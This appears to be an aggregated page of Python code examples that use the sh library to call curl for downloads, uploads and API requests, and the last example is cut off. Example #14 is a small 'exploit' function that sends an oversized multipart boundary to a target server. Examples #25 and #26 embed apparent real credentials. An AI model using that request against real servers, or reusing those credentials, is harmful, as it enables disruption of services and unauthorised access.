Example #1
    def install(self):
        arch = list(self.filtered_archs)[0]
        build_dir = self.get_build_dir(arch.arch)
        os.chdir(build_dir)
        hostpython = sh.Command(self.ctx.hostpython)

        #shprint(hostpython, "bootstrap.py")
        #shprint(hostpython, "setup.py", "install", "--prefix=" + join(self.ctx.dist_dir, "hostpython"))

        sh.curl("-O", "https://bootstrap.pypa.io/ez_setup.py")
        shprint(hostpython, "./ez_setup.py")
        # Extract setuptools egg and remove .pth files. Otherwise subsequent
        # python package installations using setuptools will raise exceptions.
        # Setuptools version 28.3.0
        site_packages_path = join(self.ctx.dist_dir, 'hostpython', 'lib',
                                  'python2.7', 'site-packages')
        os.chdir(site_packages_path)
        with open('setuptools.pth', 'r') as f:
            setuptools_egg_path = f.read().strip('./').strip('\n')
            unzip = sh.Command('unzip')
            shprint(unzip, setuptools_egg_path)
        os.remove(setuptools_egg_path)
        os.remove('setuptools.pth')
        os.remove('easy-install.pth')
        shutil.rmtree('EGG-INFO')
Example #2
def skeletonize():
    '''Update Skeleton HTML5-Boilerplate.'''
    print green("Skeletonizing the project directory...")

    # Skeleton
    print blue("Installing skeleton HTML5 Boilerplate.")
    os.chdir(PROJ_DIR)
    sh.git.submodule.update(init=True)

    os.chdir(PROJ_DIR + "/skeleton")
    sh.git.pull("origin", "master")
    sh.rsync("-av", "images", "{0}/{1}/static/".format(PROJ_DIR,APP_NAME))
    sh.rsync("-av", "stylesheets",  "{0}/{1}/static/".format(PROJ_DIR,APP_NAME))
    sh.rsync("-av", "index.html",  "{0}/{1}/templates/base_t.html".format(PROJ_DIR,APP_NAME))
    os.chdir(PROJ_DIR)

    # Patch the base template with templating tags
    print blue("Patching the base template.")
    os.chdir(PROJ_DIR + "/{0}/templates/".format(APP_NAME))
    template_patch = open("base_t.patch")
    sh.patch(strip=0, _in=template_patch)
    template_patch.close()
    os.chdir(PROJ_DIR)

    # Jquery
    print blue("Installing jquery 1.9.0.")
    os.chdir(PROJ_DIR + "/" + APP_NAME + "/static/js")
    sh.curl("http://code.jquery.com/jquery-1.9.0.min.js", O=True)
    os.chdir(PROJ_DIR)
Example #3
def create(version_number):
    heading1("Creating new version based on Fedora " + version_number + "\n")

    # Update git and create new version.
    heading2("Updating master branch.")
    print(git.checkout("master"))
    print(git.pull())  # Bring branch current.

    heading2("Creating new branch")
    print(git.checkout("-b" + version_number))  # Create working branch.

    # Get kickstart files.
    heading2("Creating fedora-kickstarts directory\n")
    mkdir("-p", (base_dir + "/fedora-kickstarts/"))
    cd(base_dir + "/fedora-kickstarts/")

    heading2("Downloading Fedora kickstart files.")
    ks_base = "https://pagure.io/fedora-kickstarts/raw/f" \
              + version_number + "/f"

    for file in ks_files:
        file_path = ks_base + "/fedora-" + file

        print ("Downloading " + file_path)
        curl("-O", file_path)
Example #4
    def download_client_config(self, cluster, service):
        """Download the client configuration zip for a particular cluster and service.

        Since cm_api does not provide a way to download the archive, we build
        the URL manually and download the file. Once the file is downloaded,
        the archive is extracted and its contents are copied to the Hadoop
        configuration directories defined by Impala.
        """
        logger.info("Downloading client configuration for {0}".format(
            service.name))
        url = "http://{0}:7180/api/{1}/clusters/{2}/services/{3}/clientConfig".format(
            self.cm_host, CM_API_VERSION, urlquote(cluster.name),
            urlquote(service.name))
        path = mkdtemp()
        sh.curl(url,
                o=os.path.join(path, "clientConfig.zip"),
                _out=tee,
                _err=tee)
        current = os.getcwd()
        os.chdir(path)
        sh.unzip("clientConfig.zip")
        for root, _, file_names in os.walk("."):
            for filename in fnmatch.filter(file_names, "*.xml"):
                src = os.path.join(root, filename)
                dst = os.path.join(self.impala_home, "fe", "src", "test",
                                   "resources")
                logger.debug("Copying {0} to {1}".format(src, dst))
                shutil.copy(src, dst)
        os.chdir(current)
Example #5
def setup_vim():
    autoload = join(HOME, '.vim', 'autoload')
    mkdir_p(autoload)
    sh.curl('-fLo', join(autoload, 'plug.vim'), 'https://raw.github.com/junegunn/vim-plug/master/plug.vim')
    link_home('vimrc')

    print '  Running PlugInstall'
    sh.vim('+PlugInstall', '+qall')
Example #6
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O",  "https://bootstrap.pypa.io/ez_setup.py")
     dest_dir = join(self.ctx.dist_dir, "root", "python")
     build_env = arch.get_env()
     build_env['PYTHONPATH'] = join(dest_dir, 'lib', 'python2.7', 'site-packages')
     # shprint(hostpython, "./ez_setup.py", "--to-dir", dest_dir)
     shprint(hostpython, "./ez_setup.py", _env=build_env)
Example #7
def setup_vim():
    autoload = join(HOME, '.vim', 'autoload')
    mkdir_p(autoload)
    sh.curl('-fLo', join(autoload, 'plug.vim'),
            'https://raw.github.com/junegunn/vim-plug/master/plug.vim')
    link_home('vimrc')

    print '  Running PlugInstall'
    sh.vim('+PlugInstall', '+qall')
Example #8
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O", "https://bootstrap.pypa.io/ez_setup.py")
     dest_dir = join(self.ctx.dist_dir, "root", "python")
     build_env = arch.get_env()
     build_env['PYTHONPATH'] = join(dest_dir, 'lib', 'python2.7',
                                    'site-packages')
     # shprint(hostpython, "./ez_setup.py", "--to-dir", dest_dir)
     shprint(hostpython, "./ez_setup.py", _env=build_env)
Example #9
def test_keyword_arguments():
    from sh import curl, adduser
    # resolves to "curl http://duckduckgo.com/ -o page.html --silent"
    curl('http://duckduckgo.com/', o='page.html', silent=True)

    # or if you prefer not to use keyword arguments, this does the same thing
    curl('http://duckduckgo.com/', '-o', 'page.html', '--silent')

    # resolves to "adduser amoffat --system --shell=/bin/bash --no-create-home"
    adduser('amoffat', system=True, shell='/bin/bash', no_create_home=True)
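
Note: the comments above cover how plain keyword arguments become command-line flags. Many of the examples on this page also rely on sh's special underscore-prefixed keywords (_out, _err, _in, _env, _piped, ...), which configure how the command runs rather than being passed to it. A minimal sketch of that distinction, assuming curl is on PATH and the URL is only a placeholder:

import io
import sh

def fetch_quietly(url):
    # silent=True becomes --silent and location=True becomes --location,
    # while _out is consumed by sh itself and redirects stdout into the buffer
    buf = io.StringIO()
    sh.curl(url, location=True, silent=True, _out=buf)
    return buf.getvalue()

# hypothetical usage:
# html = fetch_quietly('http://duckduckgo.com/')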
Example #10
def add_pr_to_checkout(repo, pr_id, head_sha1, pr_branch, spec):
    sh.curl(
        '-s', '-k', '-L',
        "https://github.com/crowbar/%s/compare/%s...%s.patch" %
        (repo, pr_branch, head_sha1), '-o', 'prtest.patch')
    sh.sed('-i', '-e', 's,Url:.*,%define _default_patch_fuzz 2,', '-e',
           's,%patch[0-36-9].*,,', spec)
    Command('/usr/lib/build/spec_add_patch')(spec, 'prtest.patch')
    iosc('vc', '-m',
         "added PR test patch from %s#%s (%s)" % (repo, pr_id, head_sha1))
Example #11
def add_pr_to_checkout(repo, pr_id, head_sha1, pr_branch, spec):
    sh.curl(
        '-s', '-k', '-L',
        "https://github.com/crowbar/%s/compare/%s...%s.patch" % (
            repo, pr_branch, head_sha1),
        '-o', 'prtest.patch')
    sh.sed('-i', '-e', 's,Url:.*,%define _default_patch_fuzz 2,',
           '-e', 's,%patch[0-36-9].*,,', spec)
    Command('/usr/lib/build/spec_add_patch')(spec, 'prtest.patch')
    iosc('vc', '-m', "added PR test patch from %s#%s (%s)" % (
        repo, pr_id, head_sha1))
Example #12
def swatch():
    proj()

    print(". rocking the bootswatch plunder")

    themes = json.loads(str(sh.curl("http://api.bootswatch.com")))["themes"]
    for theme in themes:
        print(".. getting %s" % theme["name"])
        open("lib/swatch/bootswatch.%s.min.css" % theme["name"], "w").write(
            re.sub(r'background.*glyphicons[^;]*;', "",
                   str(sh.curl(theme["css-min"]))))
Example #13
    def __curl_file(
            container_image_signature_file_path,
            container_image_signature_name,
            signature_server_url,
            signature_server_username,
            signature_server_password
    ):
        """Sends the signature file

        Raises
        ------
        StepRunnerException
            If error pushing image signature.
        """
        # remove any trailing / from url
        signature_server_url = re.sub(r'/$', '', signature_server_url)
        container_image_signature_url = f"{signature_server_url}/{container_image_signature_name}"

        # calculate hashes
        with open(container_image_signature_file_path, 'rb') as container_image_signature_file:
            container_image_signature_file_contents = container_image_signature_file.read()
            signature_file_md5 = hashlib.md5(container_image_signature_file_contents).hexdigest()
            signature_file_sha1 = hashlib.sha1(container_image_signature_file_contents).hexdigest()

        try:
            stdout_result = StringIO()
            stdout_callback = create_sh_redirect_to_multiple_streams_fn_callback([
                sys.stdout,
                stdout_result
            ])

            # -s: Silent
            # -S: Show error
            # -f: Don't print out failure document
            # -v: Verbose
            sh.curl(  # pylint: disable=no-member
                '-sSfv',
                '-X', 'PUT',
                '--header', f'X-Checksum-Sha1:{signature_file_sha1}',
                '--header', f'X-Checksum-MD5:{signature_file_md5}',
                '--user', f"{signature_server_username}:{signature_server_password}",
                '--upload-file', container_image_signature_file_path,
                container_image_signature_url,
                _out=stdout_callback,
                _err_to_out=True,
                _tee='out'
            )
        except sh.ErrorReturnCode as error:
            raise StepRunnerException(
                f"Error pushing signature file to signature server using curl: {error}"
            ) from error

        return container_image_signature_url, signature_file_md5, signature_file_sha1
Example #14
def exploit(url, username, password):
    #4092 characters
    boundary = "aasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfas
dfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfasdfasdfasdfasdfadsfasdfdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdff"
    content_type = "Content-Type: multipart/form-data; boundary="
    #file of 4097 characters
    file = "/Users/Winston/Desktop/data.txt"
    sh.curl(url,
            anyauth=True,
            X="POST",
            H=content_type + boundary,
            T=file,
            u="%s:%s" % (username, password))
Example #15
def reQuerySessions(from_session, to_session, prevSes=None):
    if to_session is None:
        to_session = dbWork.highestSessionId()

    if to_session == 'stdin':
        secRange = prevSes
    else:
        secRange = range(from_session, min(to_session + 1, dbWork.highestSessionId()))

    print('Doing a re-query of previous sessions up to {}'.format(to_session))
    for j in secRange:
        if max(qcRedisRecCountBySession(j), qcDumpRecCountBySession(j)) < dbWork.recCountBySession(j):
            sh.curl('-k', 'https://localhost/backend/qc/report/session/{}'.format(j))
            time.sleep(0.01)
Example #16
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O", "https://bootstrap.pypa.io/ez_setup.py")
     shprint(hostpython, "./ez_setup.py", _env=self.get_stt_env(arch))
     # Extract setuptools egg and remove .pth files. Otherwise subsequent
     # python package installations using setuptools will raise exceptions.
     # Setuptools version 28.3.0
     site_packages_path = join(self.ctx.dist_dir, 'hostpython2', 'lib',
                               'python2.7', 'site-packages')
     os.chdir(site_packages_path)
     with open('setuptools.pth', 'r') as f:
         setuptools_egg_path = f.read().strip('./').strip('\n')
         unzip = sh.Command('unzip')
         shprint(unzip, setuptools_egg_path)
Example #17
def runQC(from_session, to_session, sleep_between, avoid_timeout):
    """
    Runs QC on recordings which haven't been analyzed by QC yet.
    """
    if to_session is None:
        to_session = dbWork.highestSessionId()

    if to_session == 'stdin':
        sesRange = sys.stdin
        prevSes = []
    else:
        sesRange = range(from_session, min(to_session + 1, dbWork.highestSessionId()))

    start = time.time()
    totalDiff = 0
    for i in sesRange:
        # if in individual_sessions mode, strip newline
        if type(i) is str:
            i = i.strip()
        if to_session == 'stdin':
            prevSes.append(i)

        print('Processing session {}'.format(i))
        recsOnDisk = qcDumpRecCountBySession(i)
        recsInRedis = qcRedisRecCountBySession(i)
        recsInDb = dbWork.recCountBySession(i)
        recsDone = max(recsInRedis, recsOnDisk)
        if verbose:
            print('Recs done: {}'.format(recsDone))
            print('..in redis: {}'.format(recsInRedis))
            print('..on disk: {}'.format(recsOnDisk))
            print('..recs in db: {}'.format(recsInDb))
        if (recsDone < recsInDb):
            print('Querying QC for session {}'.format(i))
            sh.curl('-k', 'https://localhost/backend/qc/report/session/{}'.format(i))
            time.sleep(sleep_between)
            diff = dbWork.recCountBySession(i)-recsDone
            totalDiff+=diff
            print('Diff:',diff)

        # also routinely check unfinished sessions already checked to avoid a timeout
        end = time.time()
        if (end - start) > avoid_timeout:
            start = time.time()
            if to_session == 'stdin':
                reQuerySessions(from_session, to_session, prevSes)
            else:
                reQuerySessions(from_session, i)
    print('totalDiff:',totalDiff)
Example #18
def check_termination():
    res = sh.curl(
        '-s', 'http://169.254.169.254/latest/meta-data/spot/termination-time')
    mat = re.match('.*T.*Z', str(res))

    # return True if the instance is marked for termination
    return mat is not None
Example #19
def check_upgrade():
        server_file = curl(PIFM_HOST + '/client_agent/pifm_agent.py')
        server_sum = awk(
                        md5sum(
                            grep(server_file, '-v', '^PIFM_HOST')
                        ), '{print $1}'
        )

        local_sum = awk(
                        md5sum(
                            grep('-v', '^PIFM_HOST', OUR_SCRIPT)
                        ), '{print $1}'
        )

        if str(server_sum) != str(local_sum):
            logging.info(
                "server: {server}, local: {local}, should update.".format(
                    server=server_sum,
                    local=local_sum
                )
            )
            with open(TMP_SCRIPT, 'w') as f:
                f.write(str(server_file))
            sed('-i',
                "0,/def/ s#http://pi_director#{myhost}#".format(myhost=PIFM_HOST),
                OUR_SCRIPT
                )
            status = python('-m', 'py_compile', TMP_SCRIPT)
            if (status.exit_code == 0):
                shutil.copy(TMP_SCRIPT, OUR_SCRIPT)
                os.chmod(OUR_SCRIPT, 0755)
                sys.exit(0)
Example #20
def swatch():
    proj()

    print(". rocking the bootswatch plunder")
    
    themes = json.loads(str(sh.curl("http://api.bootswatch.com")))["themes"]
    for theme in themes:
        print(".. getting %s" % theme["name"])
        open(
            "lib/swatch/bootswatch.%s.min.css" % theme["name"], "w"
        ).write(
            re.sub(
                r'background.*glyphicons[^;]*;',
                "",
                str(sh.curl(theme["css-min"])))
        )
Example #21
def search_single(term):
    UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" 
    base = "https://www.google.com/search?q="
    query = base + term 
    res = curl(query, A=UA)
    soup = BeautifulSoup(res.stdout)
    return soup
Example #22
def get_api(section, sect_id, page_num=None, with_moves=None):

    have_params = False

    page = ''
    if page_num is not None:
        have_params = True
        page = 'page=' + str(page_num)

    moves_param = ''
    if with_moves is not None:
        have_params = True
        moves_param = 'with_moves=' + str(with_moves)

    params = ''
    if have_params:
        params = '?'
        if page != '':
            params += page
            if moves_param != '':
                params += '&'

        if moves_param != '':
            params += moves_param

    req_str = 'https://lichess.org/api/' + section + '/' + sect_id + params
    print(req_str)
    return sh.curl(req_str)
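
A hedged usage sketch for get_api above; the section and ID are placeholders, but the URL construction follows directly from the code:

# prints and requests
# https://lichess.org/api/tournament/someTournamentId?page=2&with_moves=1
# result = get_api('tournament', 'someTournamentId', page_num=2, with_moves=1)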
Example #23
def send_email(user, event, message, **kw):
  if user not in config['email']['user_emails']:
    return

  args = {
    'f': config['email']['from_address'],
    't': config['email']['user_emails'][user],
    'u': kw['subject'] if 'subject' in kw else 'Notification',
  }

  if 'app' not in kw:
    kw['app'] = config['default_app']

  body = HTML('html')
  tr = body.table().tr()
  tr.td(valign='top').img(src=config['icons'][kw['app']], style='float:left; margin: 15px')
  try:
    if 'email_body' in kw:
      tr.td().text(kw['email_body'], escape=False)
    else:
      getattr(notifications, event + '_email')(tr.td(), message, **kw)
  except:
    with tr.td().p(style='margin-top: 15px') as p:
      p.b("Message:")
      p.br()
      p.text(message)

  ip = curl('ifconfig.me').strip()
  if ip != config['ip']:
    ybdst = ssh.bake(config['ip'])
    print "Sent %s email to %s" % (event, user)
    return ybdst.sendemail(_in=str(body), **args)
  else:
    print "Sent %s email to %s" % (event, user)
    return sendemail(_in=str(body), **args)
Example #24
def fix_bootstrap_py(folder):
    """
    Update bootstrap.py to make sure it's the latest version.

    This fixes some buildout bootstrapping failures on old sites.
    """
    from sh import curl

    bootstrap_py = os.path.join(folder, "bootstrap.py")

    # http://stackoverflow.com/questions/14817138/zc-buildout-2-0-0-release-somehow-ends-up-breaking-plone-3-3-buildouts/14817272#14817272
    url = "http://downloads.buildout.org/1/bootstrap.py"

    print "Fixing %s to known good version" % bootstrap_py

    curl("-L", "-o", bootstrap_py, url)
Example #25
def login(l):
    #login = l.client.post("/iam/v1/authenticate", {"username":"******", "password":'******'})
    token_curl = curl(
        'https://{0}/aims/v1/authenticate'.format('ecepeda-api.route105.net'),
        '-s', '-k', '-X', 'POST', '-H', 'Accept: application/json', '--user',
        '2A6B0U16535H6X0D5822:$2a$12$WB8KmRcUnGpf1M6oEdLBe.GrfBEaa94U4QMBTPMuVWktWZf91AJk'
    )
    return json.loads(str(token_curl))['authentication']['token']
Example #26
File: a.py Project: futuregrid/cm
def get_token():
#    curl("-d", "'{\"auth\":{\"passwordCredentials\":{\"username\": \"%(username)s\", \"password\": \"%(password)s\"}}}' -H \"Content-type: application/json\" http://%(ip)s:35357/v2.0/tokens" % data
    result = curl("-d",
		  "'{\"auth\":{\"passwordCredentials\":{\"username\": \"gvonlasz\", \"password\": \"OTg5NmVkZTdkMzEwOThmMDMxZDJmNmY1\"}}}'",
	"-H",
	"\"Content-type: application/json\"",
	"http://149.165.146.50:35357/v2.0/tokens")
    print result
Example #27
def curl(src, dest):
    """ Installs `src` to path `dest` """
    spinner = Halo(text="curl {}".format(dest),
                   spinner="dots",
                   placement="right")
    spinner.start()
    if os.path.exists(dest):
        spinner.info("{} already exists".format(dest))
        return

    try:
        sh.curl("-fLo", dest, src)
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error("Error downloading file `%s`: %s", src, err_message)
        spinner.fail()
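
A hedged usage sketch for the wrapper above, reusing the vim-plug URL from the earlier setup_vim examples; the destination path is arbitrary:

# skips the download when the destination already exists, otherwise runs
# roughly: curl -fLo <dest> <src>
# curl("https://raw.github.com/junegunn/vim-plug/master/plug.vim",
#      os.path.expanduser("~/.vim/autoload/plug.vim"))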
Example #28
 def create_hacking(self, version=None):
     extracts = glob.glob('%s/*' % self.extractdir)
     for extract in extracts:
         dst = os.path.join(extract, 'hacking')
         if not os.path.exists(dst):
             os.makedirs(dst)
             env_dst = os.path.join(dst, 'env-setup')
             logger.debug(env_dst)
             res = curl('-o', env_dst, self.ENV_SETUP)
Example #29
 def fullquery(
     self,
     database,
     dataset,
     data_format="j",
     limit=None,
     rows=None,
     start_date=None,
     end_date=None,
     order="asc",
     column_index=None,
     collapse=None,
     transform=None,
     send=False,
 ):
     database = database.upper() + "/"
     dataset = dataset.upper() + typetable[data_format] + "?"
     # validate start and end date arguments and append '&'
     if validate_date(start_date):
         start_date = "start_date=" + start_date + "&"
     else:
         start_date = ""
     if validate_date(end_date):
         end_date = "end_date=" + end_date + "&"
     else:
         end_date = ""
      # default any unset optional arguments to '' so the string
      # concatenation below never sees None
      column_index = "column_index=" + str(column_index) + "&" if column_index else ""
      limit = "limit=" + str(limit) + "&" if limit else ""
      rows = "rows=" + str(rows) + "&" if rows else ""
     collapse = "collapse=" + collapse + "&" if collapse else ""
     transform = "transformation=" + transform + "&" if transform else ""
     order = "order=" + order + "&"
     api_key = "api_key=" + self.APIKEY + "&"
     qstring = (
         self.BASEURL
         + "datasets/"
         + database
         + dataset
         + api_key
         + limit
         + rows
         + start_date
         + end_date
         + order
         + column_index
         + collapse
         + transform
     )
     if send:
         return sh.curl(qstring)
     else:
         return qstring
Example #30
def font(name):
    """ Installs fonts using curl.

    Args:
        name (str): The name of the font as defined in `font_library` dictionary.
    """
    spinner = Halo(text="Font {}".format(name),
                   spinner="dots",
                   placement="right")
    spinner.start()
    try:
        library = os.path.join(HOME, "Library/Fonts")
        path = os.path.join(library, name)
        sh.curl("-fLo", path, font_library[name])
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error("Error installing font `%s`: %s", name, err_message)
        spinner.fail()
Example #31
def send_requests(hostname, throughput, duration, sections_number):
    """

    :param str hostname: destination host or IP
    :param int throughput: number of requests per sec
    :param int duration: in [s]
    :param int sections_number: number of sections
    :return:
    """

    print 'Sending {0} requests per sec for {1} seconds ... '.format(throughput, duration)
    sleep_time = 1 / float(throughput)
    print 'Sleeping {0}[s] between requests.'.format(sleep_time)
    for i in range(0, duration * throughput):
        section_id = random.randint(0, sections_number-1)
        url_path = 'http://{0}/{1}/{2}'.format(hostname, section_id, 'test.html')
        curl(url_path, silent=True)
        print url_path
        time.sleep(sleep_time)
Example #32
def get_token():
    # curl("-d", "'{\"auth\":{\"passwordCredentials\":{\"username\":
    # \"%(username)s\", \"password\": \"%(password)s\"}}}' -H \"Content-type:
    # application/json\" http://%(ip)s:35357/v2.0/tokens" % data
    result = curl(
        "-d",
        "'{\"auth\":{\"passwordCredentials\":{\"username\": \"gvonlasz\", \"password\": \"OTg5NmVkZTdkMzEwOThmMDMxZDJmNmY1\"}}}'",
        "-H", "\"Content-type: application/json\"",
        "http://149.165.146.50:35357/v2.0/tokens")
    print result
Example #33
def do_curl(_url, **kw):
    args = {}
    if 'cookie' in kw:
        cookie = kw['cookie']
        del kw['cookie']
        args['b'] = cookie
    data = urlencode(kw)
    if len(kw) > 0:
        args['d'] = data
    return curl(_url, **args)
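
A hedged usage sketch for do_curl above; the URL, form fields, and cookie value are invented for illustration:

# resolves roughly to:
#   curl -b 'sid=42' -d 'user=alice&next=%2Fhome' http://example.com/login
# do_curl('http://example.com/login', user='alice', next='/home', cookie='sid=42')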
Example #34
 def prebuild_arch(self, arch):
     hostpython = sh.Command(self.ctx.hostpython)
     sh.curl("-O",  "https://bootstrap.pypa.io/ez_setup.py")
     shprint(hostpython, "./ez_setup.py")
     # Extract setuptools egg and remove .pth files. Otherwise subsequent
     # python package installations using setuptools will raise exceptions.
     # Setuptools version 28.3.0
     site_packages_path = join(
         self.ctx.dist_dir, 'hostpython',
         'lib', 'python2.7', 'site-packages')
     os.chdir(site_packages_path)
     with open('setuptools.pth', 'r') as f:
         setuptools_egg_path = f.read().strip('./').strip('\n')
         unzip = sh.Command('unzip')
         shprint(unzip, setuptools_egg_path)
     os.remove(setuptools_egg_path)
     os.remove('setuptools.pth')
     os.remove('easy-install.pth')
     shutil.rmtree('EGG-INFO')
Example #35
def curl_check_url(url, target_dir):
    """
    tries to get .listing file at url and write to target_dir.

    Args:
        url (str): the URL location of the remote file directory
        target_dir (str): the filepath to write the listing file to

    Returns:
        str: the .listing filepath or None if one wasn't generated

    Raises:
        Exception: whatever exception was raised when things went wrong
    """
    listing_fname = target_dir + "/.listing"
    sh.curl('-l', url, _out=listing_fname)
    if os.path.isfile(listing_fname):
        return listing_fname
    return None
Example #36
def do_curl(_url, **kw):
  args = {}
  if 'cookie' in kw:
    cookie = kw['cookie']
    del kw['cookie']
    args['b'] = cookie
  data = urlencode(kw)
  if len(kw) > 0:
    args['d'] = data
  return curl(_url, **args)
Example #37
    def _get_code(self, nmpi_job, job_desc):
        """
        Obtain the code and place it in the working directory.

        If the experiment description is the URL of a Git repository, try to clone it.
        If it is the URL of a zip or .tar.gz archive, download and unpack it.
        Otherwise, the content of "code" is the code: write it to a file.
        """
        url_candidate = urlparse(nmpi_job['code'])
        logger.debug("Get code: %s %s", url_candidate.netloc,
                     url_candidate.path)
        if url_candidate.scheme and url_candidate.path.endswith(
            (".tar.gz", ".zip", ".tgz")):
            self._create_working_directory(job_desc.working_directory)
            target = os.path.join(job_desc.working_directory,
                                  os.path.basename(url_candidate.path))
            #urlretrieve(nmpi_job['code'], target) # not working via KIP https proxy
            curl(nmpi_job['code'], '-o', target)
            logger.info("Retrieved file from {} to local target {}".format(
                nmpi_job['code'], target))
            if url_candidate.path.endswith((".tar.gz", ".tgz")):
                tar("xzf", target, directory=job_desc.working_directory)
            elif url_candidate.path.endswith(".zip"):
                try:
                    # -o for auto-overwrite
                    unzip('-o', target, d=job_desc.working_directory)
                except:
                    logger.error("Could not unzip file {}".format(target))
        else:
